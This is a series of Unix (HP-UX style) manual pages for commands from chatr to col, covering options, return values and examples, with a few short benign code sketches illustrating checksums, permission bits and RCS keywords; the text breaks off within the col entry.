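For the example above, the first illegal option is +xyz, and the words enable, enable, enable, and file follow it, giving 4.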
Invalid arguments
If you use an invalid argument with a valid option and you do not specify a filename, chatr returns 0,
as in this example:
chatr +b <no argument>
If you specify a file name (regardless of whether or not the file exists), chatr returns the number of files
specified. The following example returns 3:
chatr <no argument> file1 file2 file3
Invalid files
If the command cannot act on any of the files given, it returns the total number of files specified (if some
option is specified). Otherwise it returns the number of files upon which it could not act. If a2 does not
have read/write permission, the first of the following examples returns 4 and the second returns 1:
chatr +b enable a1 a2 a3 a4
chatr a1 a2 a3 a4
EXTERNAL INFLUENCES
Environment Variables
The following internationalization variables affect the execution of chatr:
LC_MESSAGES Determines the locale category for diagnostic messages written to standard error.
LC_NUMERIC Determines the locale category for numeric formatting.
NLSPATH Determines the location of message catalogues for the processing of LC_MESSAGES.
If any internationalization variable contains an invalid setting, chatr behaves as if all internationaliza-
tion variables are set to C. See environ (5).
In addition, the following environment variable affects chatr:
TMPDIR Specifies a directory for temporary files (see tmpnam (3S)).
EXAMPLES
Change a.out to demand-loaded
chatr -q a.out
Change binding mode of program file that uses shared libraries to immediate and nonfatal. Also enable
usage of SHLIB_PATH environment variable:
chatr -B immediate -B nonfatal +s enable a.out
Disallow run-time path lookup for the shared library /usr/lib/libc.sl that the shared library
libfoo.sl depends on:
chatr +l /usr/lib/libc.sl libfoo.sl
Given segment index number 5 from a previous run of chatr, change the page size to 4 kilobytes:
chatr +si 5 +p 4K average64
WARNINGS
This release of the chatr command no longer supports the following options:
• -n
• -q
• -M
• -N
• +getbuckets size
• +plabel_cache flag
• +q3p flag
• +q4p flag
AUTHOR
chatr was developed by HP.
SEE ALSO
System Tools
ld(1) invoke the link editor
dld.so (5) dynamic loader
Miscellaneous
a.out (4) assembler, compiler, and linker output
magic (4) magic number for HP-UX implementations
sam(1M) system administration manager
checknr(1) checknr(1)
NAME
checknr - check nroff/troff files
SYNOPSIS
checknr [-s] [-f] [-a.x1.y1.x2.y2 ... .xn.yn] [-c.x1.x2.x3 ... .xn] [file ...]
DESCRIPTION
checknr searches a list of nroff or troff input files for certain kinds of errors involving
mismatched opening and closing delimiters and unknown commands. If no files are specified, checknr
searches the standard input. checknr looks for the following:
• Font changes using \fx ... \fP.
• Size changes using \sx ... \s0.
• Macros that come in open ... close forms, such as the .TS and .TE macros, which must appear
in matched pairs.
checknr knows about the ms and me macro packages.
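A drastically simplified model of this pair checking is sketched below. The code is hypothetical and for illustration only; the real checknr also tracks macro pairs and reports line numbers:

```python
import re

def check_font_size_pairs(text):
    """Toy checker: every \\fX font change must be closed by \\fP, and
    every \\sN size change by \\s0. Returns a list of complaints."""
    errors = []
    font_depth = size_depth = 0
    for m in re.finditer(r'\\f(.)|\\s(\d+)', text):
        if m.group(1) is not None:          # a \fX font change
            if m.group(1) == 'P':
                if font_depth == 0:
                    errors.append('unmatched \\fP')
                else:
                    font_depth -= 1
            else:
                font_depth += 1
        else:                               # a \sN size change
            if m.group(2) == '0':
                if size_depth == 0:
                    errors.append('unmatched \\s0')
                else:
                    size_depth -= 1
            else:
                size_depth += 1
    if font_depth:
        errors.append('font change never closed with \\fP')
    if size_depth:
        errors.append('size change never closed with \\s0')
    return errors
```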
Options
checknr recognizes the following options:
-a Define additional macro pairs in the list. -a is followed by groups of six characters, each
group defining a pair of macros. Each six characters consist of a period, the first macro name,
another period, and the second macro name. For example, to define the pairs .BS and .ES,
and .XS and .XE, use:
-a.BS.ES.XS.XE
No spaces are allowed between the option and its arguments.
-c Define commands that checknr would otherwise interpret as undefined.
-f Ignore \fx font changes.
-s Ignore \sx size changes.
EXTERNAL INFLUENCES
International Code Set Support
Single-byte character code sets are supported.
DIAGNOSTICS
checknr complains about unmatched delimiters, unrecognized commands, and bad command syntax.
EXAMPLES
Check file sorting for errors that involve mismatched opening and closing delimiters and unknown
commands, but disregard errors caused by font changes:
checknr -f sorting
WARNINGS
checknr is designed for use on documents prepared with the intent of using checknr, much the same
as lint is used. It expects a certain document writing style for \f... and \s... commands, in which
each \fx is terminated with \fP and each \sx is terminated with \s0. Although text files format prop-
erly when the next font or point size is coded directly instead of using \fP or \s0, such techniques pro-
duce complaints from checknr . If files are to be examined by checknr , the \fP and \s0 delimiting con-
ventions should be used.
-a cannot be used to define single-character macro names.
checknr does not recognize certain reasonable constructs such as conditionals.
AUTHOR
checknr was developed by the University of California, Berkeley.
SEE ALSO
checkeq(1), lint(1), nroff(1).
chfn(1) chfn(1)
NAME
chfn - change user information; used by finger
SYNOPSIS
chfn [login-name ]
chfn -r files [login-name ]
chfn -r nis [login-name ]
chfn -r nisplus [login-name ]
chfn -r dce [login-name ]
DESCRIPTION
The chfn command changes the user information that is stored in the repository for the current
logged-in user or for the user specified by login-name (see passwd (1)).
The information is organized as four comma-separated subfields within the reserved (5th) field of the
password file entry. It consists of the user’s full name, location code, office phone number, and home
phone number, in that order. This information is used by the finger command and other programs (see
finger(1)).
chfn prompts you for each subfield. The prompt includes a default value, which is enclosed in brackets.
Accept the default value by pressing the Return key. To enter a blank subfield, type the word none.
The DCE repository (-r dce) is only available if Integrated Login has been configured, see
auth.adm (1M). If Integrated Login has been configured, other considerations apply. A user with
appropriate DCE privileges is capable of modifying a user’s finger (gecos) information; this is not depen-
dent upon superuser privileges.
If the repository is not specified; i.e., chfn [login-name ], the finger information is changed in the passwd
file only.
Run finger after running chfn to make sure the information was processed correctly.
Options
The following option is recognized:
-r Specify the repository to which the operation is to be applied. Supported reposi-
tories include files, nis, nisplus, and dce.
Subfield Values
Name Up to 1022 printing characters.
The finger command and other utilities expand an & found anywhere in this
subfield by substituting the login name for it and shifting the first letter of the
login name to uppercase. (chfn does not alter the input &.)
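The '&' expansion described above amounts to a simple substitution. The sketch below is a hypothetical helper mirroring what finger does (finger itself is implemented in C):

```python
def expand_ampersand(name_subfield, login_name):
    """Replace each '&' in the gecos name subfield with the login name,
    shifting its first letter to uppercase, as finger does."""
    expanded = login_name[:1].upper() + login_name[1:]
    return name_subfield.replace('&', expanded)
```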
Location Up to 1022 printing characters.
Office Phone Up to 25 printing characters.
finger inserts appropriate hyphens if the value is all digits.
Home Phone Up to 25 printing characters.
finger inserts appropriate hyphens if the value is all digits.
Security Restrictions
You must have appropriate privileges to use the optional login-name argument to change another user’s
information.
EXAMPLES
The following is a sample run. The user’s input is shown in regular type.
Name [Tracy Simmons]:
Location (Ex: 47U-P5) []: 42L-P1
Office Phone (Ex: 1632) [77777]: 71863
Home Phone (Ex: 9875432) [4085551546]: none
WARNINGS
The encoding of office and extension information is installation-dependent.
For historical reasons, the user’s name, etc., are stored in the /etc/passwd file. This is an inappropri-
ate place to store the information.
Because two users may try to write the passwd file at once, a synchronization method was developed.
On rare occasions, chfn prints a message that the password file is busy. When this occurs, chfn sleeps
for a short time, then tries to write to the passwd file again.
AUTHOR
chfn was developed by the University of California, Berkeley.
FILES
/etc/passwd
/etc/ptmp
NOTES
The chfn command is a hard link to the passwd command. When chfn is executed, the passwd
command is actually executed with appropriate arguments to change the user gecos information in the
repository specified on the command line. If no repository is specified, the gecos information is changed
in the /etc/passwd file.
SEE ALSO
chsh(1), finger(1), passwd(1), passwd(4).
chkey(1) chkey(1)
NAME
chkey - change user’s secure RPC key pair
SYNOPSIS
chkey [ -p ] [ -s nisplus | nis | files ]
DESCRIPTION
chkey is used to change a user’s secure RPC public key and secret key pair. chkey prompts for the old
secure-rpc password and verifies that it is correct by decrypting the secret key. If the user has not
already keylogged in, chkey also prompts for the login password.
chkey ensures that the login password and the secure-rpc password are kept the same.
The key pair can be stored in the /etc/publickey file (see publickey (4)), the NIS publickey map, or
the NIS+ cred.org_dir table. If a new secret key is generated, it will be registered with the local
keyserv (1M) daemon. If no name service is specified, chkey updates the source named by the
publickey entry in /etc/nsswitch.conf. However, if multiple name services are listed, chkey
cannot decide which source to update and will display an error message. The user should specify the
source explicitly with the -s option.
Non-root users are not allowed to change their key pair in the /etc/publickey file.
Options
-p Re-encrypt the existing secret key with the user’s login password.
-s nisplus Update the NIS+ database.
-s nis Update the NIS database.
-s files Update the files database.
AUTHOR
chkey was developed by Sun Microsystems, Inc.
FILES
/etc/nsswitch.conf
/etc/publickey
SEE ALSO
keylogin(1), keylogout(1), keyserv(1M), newkey(1M), nisaddcred(1M), nsswitch.conf(4), publickey(4).
chmod(1) chmod(1)
NAME
chmod - change file mode access permissions
SYNOPSIS
/usr/bin/chmod [-A] [-R] symbolic_mode_list file ...
Obsolescent form:
/usr/bin/chmod [-A] [-R] numeric_mode file ...
DESCRIPTION
The chmod command changes the permissions of one or more files according to the value of
symbolic_mode_list or numeric_mode. You can display the current permissions for a file with the
ls -l command (see ls (1)).
Options
-A Preserve any optional access control list (ACL) entries associated with the file (HFS file sys-
tems).
RETURN VALUE
Upon completion, chmod returns one of the following values:
0 Successful completion.
>0 An error condition occurred.
EXAMPLES
Deny write permission to others:
chmod o-w file
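In terms of the underlying mode bits, o-w simply clears the others-write bit (octal 0002). A sketch using Python's stat module (illustrative only; the helper name is mine):

```python
import stat

def deny_write_to_others(mode):
    """Equivalent of the symbolic mode 'o-w': clear S_IWOTH (octal 0002)
    while leaving every other permission bit unchanged."""
    return mode & ~stat.S_IWOTH
```

Applied to a file with mode 0666, this yields 0664.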
DEPENDENCIES
The -A option causes chmod to fail on file systems that do not support ACLs.
AUTHOR
chmod was developed by AT&T and HP.
SEE ALSO
chacl(1), ls(1), umask(1), chmod(2), acl(5), aclv(5).
STANDARDS CONFORMANCE
chmod: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
chown(1) chown(1)
NAME
chown, chgrp - change file owner or group
SYNOPSIS
chown [-h] [-R] owner[:group ] file ...
chgrp [-h] [-R] group file ...
DESCRIPTION
The chown command changes the owner ID of each specified file to owner and optionally the group ID of
each specified file to group .
The chgrp command changes the group ID of each specified file to group .
owner can be either a decimal user ID or a login name found in the /etc/passwd file.
group can be either a decimal group ID or a group name found in the /etc/group file.
In order to change the owner or group, you must own the file and have the CHOWN privilege (see
setprivgrp (1M)). If either command is invoked on a regular file by other than the superuser, the set-
user-ID and set-group-ID bits of the file mode (04000 and 02000 respectively) are cleared. Note that a
given user’s or group’s ability to use this command can be restricted by setprivgrp (see
setprivgrp (1M)).
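The clearing of the set-user-ID and set-group-ID bits can be expressed as a mask operation. A sketch (the kernel performs this internally; the function name is mine):

```python
def clear_setid_bits(mode):
    """When chown/chgrp is run on a regular file by a non-superuser, the
    set-user-ID (04000) and set-group-ID (02000) bits are cleared."""
    return mode & ~0o6000
```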
Access Control Lists − HFS File Systems Only
Users can permit or deny specific individuals and groups to access a file by setting optional ACL entries
in the file’s access control list (see acl (5)). When using chown in conjunction with HFS ACLs, if the new
owner and/or group of a file does not have an optional ACL entry corresponding to user .% and/or
%.group in the file’s access control list, the file’s access permission bits remain unchanged. However, if
the new owner and/or group is already designated by an optional ACL entry of user .% and/or %.group in
the file’s ACL, chown sets the corresponding file access permission bits (and the corresponding base ACL
entries) to the permissions contained in that entry.
Options
chown and chgrp recognize the following options:
-h Change the owner or group of a symbolic link.
By default, the owner or group of the target file that a symbolic link points to is changed. With
-h, the target file that the symbolic link points to is not affected. If the target file is a direc-
tory, and you specify -h and -R, recursion does not take place.
-R Recursively change the owner or group. For each file operand that names a directory, the
owner or group of the directory and all files and subdirectories in the file hierarchy below it
are changed.
EXTERNAL INFLUENCES
Environment Variables
If any internationalization variable contains an invalid setting, chown behaves as if all
internationalization variables are set to "C". See environ (5).
RETURN VALUE
chown and chgrp return the following values:
0 Successful completion.
>0 An error condition occurred.
EXAMPLES
The following command changes the owner of the file jokes to sandi:
chown sandi jokes
The following command searches the directory design_notes and changes each file in that directory to
owner mark and group users:
chown -R mark:users design_notes
WARNINGS
The default operation of chown and chgrp for symbolic links has changed as of HP-UX release 10.0.
Use the -h option to get the former default operation.
FILES
/etc/group
/etc/passwd
SEE ALSO
chmod(1), setprivgrp(1M), chown(2), group(4), passwd(4), acl(5), aclv(5).
STANDARDS CONFORMANCE
chown: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
chgrp: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
chsh(1) chsh(1)
NAME
chsh - change default login shell
SYNOPSIS
chsh login-name [shell ]
chsh -r files login-name [shell ]
chsh -r nisplus login-name [shell ]
chsh -r nis login-name [shell ]
chsh -r dce login-name [shell ]
DESCRIPTION
The chsh command changes the login-shell for a user’s login name in the repository (see passwd (1)).
The DCE repository (-r dce) is only available if Integrated Login has been configured, see
auth.adm (1M). If Integrated Login has been configured, other considerations apply. A user with
appropriate DCE privileges is capable of modifying a user’s shell; this is not dependent upon superuser
privileges.
If the repository is not specified; i.e., chsh [login-name ], the login shell is changed in passwd file only.
Run finger after running chsh to make sure the information was processed correctly.
Arguments
login-name A login name of a user.
shell The absolute path name of a shell. If the file /etc/shells exists, the new login shell
must be listed in that file. Otherwise, you can specify one of the standard shells listed
in the getusershell (3C) manual entry. If shell is omitted, it defaults to the POSIX shell,
/usr/bin/sh.
Options
The following option is recognized:
-r Specify the repository to which the operation is to be applied. Supported reposi-
tories include files, nis, nisplus, and dce.
Security Restrictions
You must have appropriate privileges to use the optional login-name argument to change another user’s
login shell.
NETWORKING FEATURES
NFS
File /etc/passwd can be implemented as a Network Information Service (NIS) database.
EXAMPLES
To change the login shell for user voltaire to the default:
chsh voltaire
To change the login shell for user descartes to the C shell:
chsh descartes /usr/bin/csh
To change the login shell for user aristotle to the Korn shell in the DCE registry:
chsh -r dce aristotle /usr/bin/ksh
WARNINGS
As many users may try to write the /etc/passwd file simultaneously, a passwd locking mechanism was
devised. If this locking fails after repeated retries, chsh terminates.
AUTHOR
chsh was developed by HP and the University of California, Berkeley.
NOTES
The chsh command is a hard link to the passwd command. When chsh is executed, the passwd
command is actually executed with appropriate arguments to change the user login shell in the
repository specified on the command line. If no repository is specified, the login shell is changed in the
/etc/passwd file.
FILES
/etc/shells
/etc/ptmp
SEE ALSO
chfn(1), csh(1), ksh(1), passwd(1), sh(1), sh-posix(1), getusershell(3C), pam(3), passwd(4), shells(4).
ci(1) ci(1)
NAME
ci - check in RCS revisions
SYNOPSIS
ci [ options ] file ...
DESCRIPTION
ci stores new revisions into RCS files. Each file name ending in ,v is treated as an RCS file; all others
are assumed to be working files. ci deposits the contents of each working file into the corresponding
RCS file (see rcsintro (5)).
If the RCS file does not exist, ci creates it and deposits the contents of the working file as the initial
revision. The default revision number is 1.1. The access list is initialized to empty. Instead of the log
message, ci requests descriptive text (see the -t option below).
An RCS file created by ci inherits the read and execute permissions from the working file. If the RCS
file exists, ci preserves its read and execute permissions. ci always turns off all write permissions of
RCS files.
The caller of the command must have read/write permission for the directories containing the RCS file
and the working file, and read permission for the RCS file itself. A number of temporary files are created.
A semaphore file is created in the directory containing the RCS file. ci always creates a new RCS file
and unlinks the old one; therefore links to RCS files are useless.
For ci to work, the user’s login must be in the access list unless the access list is empty, the user is the
owner of the file, or the user is super-user.
Normally, ci checks whether the revision to be deposited is different from the preceding one. If it is not
different, ci either aborts the deposit (if -q is given) or asks whether to abort (if -q is omitted). A
deposit can be forced with the -f option.
If sufficient memory is not available for checking the difference between the revision to be deposited and
the preceding one, then either swap or maxdsiz values can be increased.
For each revision deposited, ci prompts for a log message. The log message should summarize the
change and must be terminated with a line containing a single "." or a control-D. If several files are being
checked in, ci asks whether or not to reuse the log message from the previous file. If the standard input
is not a terminal, ci suppresses the prompt and uses the same log message for all files (see the -m
option below).
The number of the deposited revision can be given with any of the options -r, -f, -k, -l, -u, or -q (see
-r option below).
To add a new revision to an existing branch, the head revision on that branch must be locked by the
caller. Otherwise, only a new branch can be created. This restriction is not enforced for the owner of the
file, unless locking is set to strict (see rcs (1)). A lock held by someone else can be broken with the
rcs command (see rcs (1)).
Options
-f[ rev ] Forces a deposit. The new revision is deposited even if it is not different from the preced-
ing one.
-k[ rev ] Searches the working file for keyword values to determine its revision number, creation
date, author, and state, and assigns these values to the deposited revision rather than
computing them locally. This option is useful for software distribution: a revision that is
sent to several sites should be checked in with the -k option at these
sites to preserve its original number, date, author, and state.
-l[ rev ] Works like -r, except it performs an additional co -l for the deposited revision. Thus,
the deposited revision is immediately checked out again and locked. This is useful for
saving a revision although one wants to continue editing it after the check-in.
-m"msg" Uses the string msg as the log message for all revisions checked in.
-n"name" Assigns the symbolic name name to the checked-in revision. ci prints an error message
if name is already assigned to another number.
DIAGNOSTICS
For each revision, ci prints the RCS file, the working file, and the number of both the deposited and the
preceding revision. The exit status always refers to the last file checked in, and is 0 if the operation was
successful, 1 if unsuccessful.
EXAMPLES
If the current directory contains a subdirectory RCS with an RCS file io.c,v, all of the following com-
mands deposit the latest revision from io.c into RCS/io.c,v:
ci io.c
ci RCS/io.c,v
ci io.c,v
ci io.c RCS/io.c,v
ci io.c io.c,v
ci RCS/io.c,v io.c
ci io.c,v io.c
Check in version 1.2 of RCS file foo.c,v, with the message Bug fix:
ci -r1.2 -m"Bug Fix" foo.c,v
WARNINGS
The names of RCS files are generated by appending ,v to the end of the working file name. If the result-
ing RCS file name is too long for the file system on which the RCS file should reside, ci terminates with
an error message.
The log message cannot exceed 2046 bytes.
A file with approximately 240 revisions may cause a hash table overflow. ci cannot add another revi-
sion to the file until some of the old revisions have been removed. Use the rcs -o (obsolete) command
option to remove old revisions.
RCS is designed to be used with TEXT files only. Attempting to use RCS with non-text (binary) files
results in data corruption.
AUTHOR
ci was developed by Walter F. Tichy.
SEE ALSO
co(1), ident(1), rcs(1), rcsdiff(1), rcsmerge(1), rlog(1), rcsfile(4), acl(5), rcsintro(5).
ckconfig(1) ckconfig(1)
NAME
ckconfig - verify the path names of all the FTP configuration files.
SYNOPSIS
/usr/bin/ckconfig [-V]
DESCRIPTION
The ckconfig utility is used to verify the path names of the FTP configuration files,
/etc/ftpd/ftpusers, /etc/ftpd/ftpaccess, /etc/ftpd/ftpconversions,
/etc/ftpd/ftpgroups, /etc/ftpd/ftphosts, /var/adm/syslog/xferlog, and
/etc/ftpd/pids/*.
This utility checks that all the FTP configuration files are in the specified paths. If it cannot find a
configuration file in its path, it prints an error message informing the system administrator.
The -V option causes the program to display copyright and version information, then terminate.
FILES
/usr/bin/ckconfig
AUTHOR
ckconfig was developed by the Washington University, St. Louis, Missouri.
SEE ALSO
ftpusers(4), ftpconversions(4), ftpaccess(4), ftphosts(4), ftpgroups(4), xferlog(5).
cksum(1) cksum(1)
NAME
cksum - print file checksum and sizes
SYNOPSIS
cksum [file ...]
DESCRIPTION
The cksum command calculates and prints to standard output a cyclic redundancy check (CRC) value
for each input file. The CRC used is based on the polynomial used for CRC error checking in the
ISO 8802-3 standard:

    G(x) = x^32 + x^26 + x^23 + x^22 + x^16 + x^12 + x^11 + x^10 + x^8 + x^7 + x^5 + x^4 + x^2 + x + 1

The results of the calculation are truncated to a 32-bit value. The number of bytes in the file is also
printed.
Standard input is used if no file names are given.
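The computation can be sketched in Python. This is an illustrative reimplementation of the standard POSIX cksum algorithm (assumptions: message bytes are fed most-significant bit first, the file's byte count is appended least-significant octet first, and the final remainder is complemented; the function name is mine):

```python
def posix_cksum(data):
    """Compute the POSIX cksum CRC: generator polynomial 0x04C11DB7,
    zero initial value, byte count appended, final one's complement."""
    poly = 0x04C11DB7

    def feed(crc, byte):
        crc ^= byte << 24
        for _ in range(8):
            if crc & 0x80000000:
                crc = ((crc << 1) ^ poly) & 0xFFFFFFFF
            else:
                crc = (crc << 1) & 0xFFFFFFFF
        return crc

    crc = 0
    for b in data:
        crc = feed(crc, b)
    length = len(data)
    while length:                     # append the length, low octet first
        crc = feed(crc, length & 0xFF)
        length >>= 8
    return crc ^ 0xFFFFFFFF
```

For empty input the result is 4294967295 (the complement of zero), matching what cksum prints for an empty file.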
cksum is typically used to verify data integrity when copying files between systems.
EXTERNAL INFLUENCES
Environment Variables
LC_MESSAGES determines the language in which messages are displayed.
If any internationalization variable contains an invalid setting, cksum behaves as if all internationaliza-
tion variables are set to "C". See environ (5).
RETURN VALUE
Upon completion, cksum returns one of the following values:
0 All files were processed successfully.
>0 One or more files could not be read or another error occurred.
If an inaccessible file is encountered, cksum continues processing any remaining files, but the final exit
status is affected.
SEE ALSO
sum(1), wc(1).
STANDARDS CONFORMANCE
cksum: XPG4, POSIX.2
clear(1) clear(1)
NAME
clear - clear terminal screen
SYNOPSIS
clear
DESCRIPTION
clear clears the terminal screen if it is possible to do so. It reads the TERM environment variable for
the terminal type, then reads the appropriate terminfo database to determine how to clear the screen.
FILES
/usr/share/lib/terminfo/?/* terminal database files
AUTHOR
clear was developed by the University of California, Berkeley.
SEE ALSO
terminfo(4).
cmp(1) cmp(1)
NAME
cmp - compare two files
SYNOPSIS
cmp [-l] [-s] file1 file2 [skip1 [skip2 ]]
DESCRIPTION
The cmp command compares two files. By default, cmp makes no comment if the files are the same; if
they differ, it announces the byte and line number at which the first difference occurred. skip1 and
skip2 are initial byte offsets into file1 and file2 respectively, and can be octal or decimal; the form of the
number is determined by the environment variable LC_NUMERIC (in the C locale, a leading 0 denotes an
octal number. See LANG on environ (5) and strtol (3C)).
Options
cmp recognizes the following options:
-l Print the byte number (decimal) and the differing bytes (octal) for each difference (byte
numbering begins at 1 rather than 0).
-s Print nothing for differing files; return codes only.
EXTERNAL INFLUENCES
Environment Variables
LANG determines the language in which messages are displayed. If LANG is not specified or is set to the
empty string, a default of "C" (see lang (5)) is used instead of LANG. If any internationalization variable
contains an invalid setting, cmp behaves as if all internationalization variables are set to "C". See
environ (5).
DIAGNOSTICS
cmp returns the following exit values:
0 Files are identical.
1 Files are not identical.
2 Inaccessible or missing argument.
cmp prints the following warning if the files compare equal until end-of-file is reached on file1 (or
file2) while the other file still contains data:
cmp: EOF on file1(file2)
SEE ALSO
comm(1), diff(1).
STANDARDS CONFORMANCE
cmp: SVID2, SVID3, XPG2, XPG3, XPG4, POSIX.2
co(1) co(1)
NAME
co - check out RCS revisions
SYNOPSIS
co [ options ] file ...
DESCRIPTION
co retrieves a revision from an RCS file and stores it in a corresponding working file. Revisions can be
checked out locked or unlocked. A revision checked out for reading or processing (e.g., compiling) need
not be locked. A revision checked out for editing and later checked in must normally be locked. Locking
a revision currently locked by another user fails (a lock can be broken with the rcs command, but this
poses inherent risks when independent changes are being made simultaneously; see rcs (1)). co with
locking requires the caller to be on the access list of the RCS file unless: he is the owner of the file, a
user with appropriate privileges, or the access list is empty. co without locking is not subject to access
list restrictions.
A revision is selected by number, check-in date/time, author, or state. If none of these options are
specified, the latest revision on the trunk is retrieved. When the options are applied in combination, the
latest revision that satisfies all of them is retrieved. The options for date/time, author, and state retrieve
a revision on the selected branch. The selected branch is either derived from the revision number (if
given), or is the highest branch on the trunk. A revision number can be attached to the options -l, -p,
-q, or -r.
The caller of the command must have write permission in the working directory, read permission for the
RCS file, and either read permission (for reading) or read/write permission (for locking) in the directory
that contains the RCS file.
The working file inherits the read and execute permissions from the RCS file. In addition, the owner
write permission is turned on, unless the file is checked out unlocked and locking is set to strict (see
rcs (1)).
If a file with the name of the working file exists already and has write permission, co aborts the check
out if -q is given, or asks whether to abort if -q is not given. If the existing working file is not writable,
it is deleted before the check out.
A number of temporary files are created. A semaphore file is created in the directory of the RCS file to
prevent simultaneous update.
A co command applied to an RCS file with no revisions creates a zero-length file. co always performs
keyword substitution (see below).
Options
-l[ rev ] Locks the checked out revision for the caller. If omitted, the checked out revision is not
locked. See option -r for handling of the revision number rev .
-p[ rev ] Prints the retrieved revision on the standard output rather than storing it in the working
file. This option is useful when co is part of a pipe.
-q[ rev ] Quiet mode; diagnostics are not printed.
-ddate Retrieves the latest revision on the selected branch whose check in date/time is less than
or equal to date . The date and time may be given in free format and are converted to
local time. Examples of formats for date :
Tue-PDT, 1981, 4pm Jul 21 (free format)
Fri April 16 15:52:25 EST 1982 (output of ctime(3C))
4/21/86 10:30am (format: mm/dd/yy hh:mm:ss)
Most fields in the date and time can be defaulted. co determines the defaults in the
order year, month, day, hour, minute, and second (from most- to least-significant). At
least one of these fields must be provided. For omitted fields that are of higher
significance than the highest provided field, the current values are assumed. For all
other omitted fields, the lowest possible values are assumed. For example, the date 20,
10:30 defaults to 10:30:00 of the 20th of the current month and current year. Date/time
fields can be delimited by spaces or commas. If spaces are used, the string must be sur-
rounded by double quotes.
For 2-digit year input (yy) without the presence of the century field, the following
interpretation is taken: [70-99, 00-69 (1970-1999, 2000-2069)].
-r[ rev ] Retrieves the latest revision whose number is less than or equal to rev . If rev indicates a
branch rather than a revision, the latest revision on that branch is retrieved. rev is com-
posed of one or more numeric or symbolic fields separated by a period (.). The numeric equivalent
of a symbolic field is specified with the ci -n and rcs -n commands (see ci (1) and
rcs (1)).
-sstate Retrieves the latest revision on the selected branch whose state is set to state .
-w[ login ] Retrieves the latest revision on the selected branch that was checked in by the user with
login name login . If the argument login is omitted, the caller’s login is assumed.
-jjoinlist Generates a new revision that is the result of the joining of the revisions on joinlist . join-
list is a comma-separated list of pairs of the form rev2:rev3, where rev2 and rev3 are
(symbolic or numeric) revision numbers. For the initial pair, rev1 denotes the revision
selected by the options -l, ..., -w. For all other pairs, rev1 denotes the revision gen-
erated by the previous pair, so the output of one join becomes the input to the next.
For each pair, co joins rev1 and rev3 with respect to rev2 , typically their common ances-
tor. If rev1 < rev2 < rev3 on the same branch, joining generates a new revision that is
similar to rev3 , but with all changes that lead from rev1 to rev2 undone. If changes from
rev2 to rev1 overlap with changes from rev2 to rev3 , co prints a warning and includes
the overlapping sections, delimited as follows:
<<<<<<<
rev1
=======
rev3
>>>>>>>
For the initial pair, rev2 can be omitted. The default is the common ancestor. If any of
the arguments indicate branches, the latest revisions on those branches are assumed. If
the -l option is present, the initial rev1 is locked.
Keyword Substitution
Strings of the form $keyword$ embedded in the text of the file are recognized. On check out, co replaces these strings with
strings of the form $keyword : value $. If a revision containing strings of the latter form is checked back
in, the value fields are replaced during the next checkout. Thus, the keyword values are automatically
updated on checkout.
Keywords and their corresponding values:
$Author$ The login name of the user who checked in the revision.
$Date$ The date and time the revision was checked in.
$Header$ A standard header containing the RCS file name, the revision number, the date, the
author, and the state.
$Locker$ The login name of the user who locked the revision (empty if not locked).
$Log$ The log message supplied during checkin, preceded by a header containing the RCS file
name, the revision number, the author, and the date. Existing log messages are not
replaced. Instead, the new log message is inserted after $Log:... $. This is useful for
accumulating a complete change log in a source file.
$Revision$ The revision number assigned to the revision.
$Source$ The full pathname of the RCS file.
$State$ The state assigned to the revision with rcs -s or ci -s.
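A minimal sketch of keyword expansion, assuming an RCS installation and a writable current directory (file name and log text are arbitrary):

```shell
# Embed an unexpanded keyword in a new working file.
echo 'char rcsid[] = "$Id$";' > demo.c

# Check it in and out again; -t- and -m supply the description
# and log message so that ci does not prompt.
ci -q -t-"demo" -m"initial" demo.c
co -q demo.c

# The keyword now reads $Id: demo.c ... 1.1 ... $
grep 'Id:' demo.c
```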
DIAGNOSTICS
The RCS file name, the working file name, and the revision number retrieved are written to the diagnostic
output. The exit status always refers to the last file checked out, and is 0 if the operation was successful,
1 if unsuccessful.
EXAMPLES
Assume the current directory contains a subdirectory named RCS with an RCS file named io.c,v.
Each of the following commands retrieves the latest revision from RCS/io.c,v and stores it into io.c:
co io.c
co RCS/io.c,v
co io.c,v
co io.c RCS/io.c,v
co io.c io.c,v
co RCS/io.c,v io.c
co io.c,v io.c
Check out revision 1.1 of RCS file foo.c,v into working file foo.c:
co -r1.1 foo.c,v
Check out version 1.1 of RCS file foo.c,v to the standard output:
co -p1.1 foo.c,v
Check out the version of file foo.c,v that existed on September 18, 1992:
co -d"09/18/92" foo.c,v
WARNINGS
The co command generates the working file name by removing the ,v from the end of the RCS file
name. If the given RCS file name is too long for the file system on which the RCS file should reside, co
terminates with an error message.
There is no way to suppress the expansion of keywords, except by writing them differently. In nroff
and troff, this is done by embedding the null-character \& into the keyword.
The -d option gets confused in some circumstances, and accepts no date before 1970.
The -j option does not work for files containing lines consisting of a single . .
RCS is designed to be used with text files only. Attempting to use RCS with non-text (binary) files results
in data corruption.
AUTHOR
co was developed by Walter F. Tichy.
SEE ALSO
ci(1), ident(1), rcs(1), rcsdiff(1), rcsmerge(1), rlog(1), rcsfile(4), acl(5), rcsintro(5).
col(1) col(1)
NAME
col - filter reverse line-feeds and backspaces
SYNOPSIS
col [-blfxp]
DESCRIPTION
col reads from the standard input and writes to the standard output. It performs the line overlays implied
by reverse line-feeds, and by forward and reverse half-line-feeds. It is particularly useful for filtering
multicolumn output made with the .rt com-
mand, and output resulting from use of the tbl preprocessor (see nroff(1) and tbl (1)).
If the -b option is given, col assumes that the output device in use is not capable of backspacing. In
this case, if two or more characters are to appear in the same place, only the last one read is output.
If the -l option is given, col assumes the output device is a line printer (rather than a character
printer) and removes backspaces in favor of multiply overstruck full lines. It generates the minimum
number of print operations necessary to generate the required number of overstrikes. (All but the last
print operation on a line are separated by carriage returns (\r); the last print operation is terminated by
a newline (\n).)
If the -f (fine) option is given, col permits forward half-line-feeds in its output; otherwise, characters
that would appear between lines are moved to the following full line. Unless the -x option is given,
col converts white space to tabs on output wherever possible to shorten
printing time.
The ASCII control characters SO (\016) and SI (\017) are assumed to start and end text in an alternate
character set; on output, col generates SI and SO characters as needed so that each character is printed
in the correct character set. On input, the only control characters accepted are space, backspace, tab,
return, new-line, SI , SO , VT (\013), and ESC followed by 7, 8, or 9. The VT character is an alternate
form of full reverse line-feed,
included for compatibility with some earlier programs of this type. All other non-printing characters are
ignored.
Normally, col ignores any unrecognized escape sequences found in its input; the -p option can be used
to cause col to output these sequences as regular characters, subject to overprinting from reverse line
motions. The use of this option is highly discouraged unless the user is fully aware of the textual position
of the escape sequences.
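A common use of -b is stripping the backspace overstrikes that nroff emits for bold and underlined text (a sketch; col ships with most systems but is not mandated everywhere):
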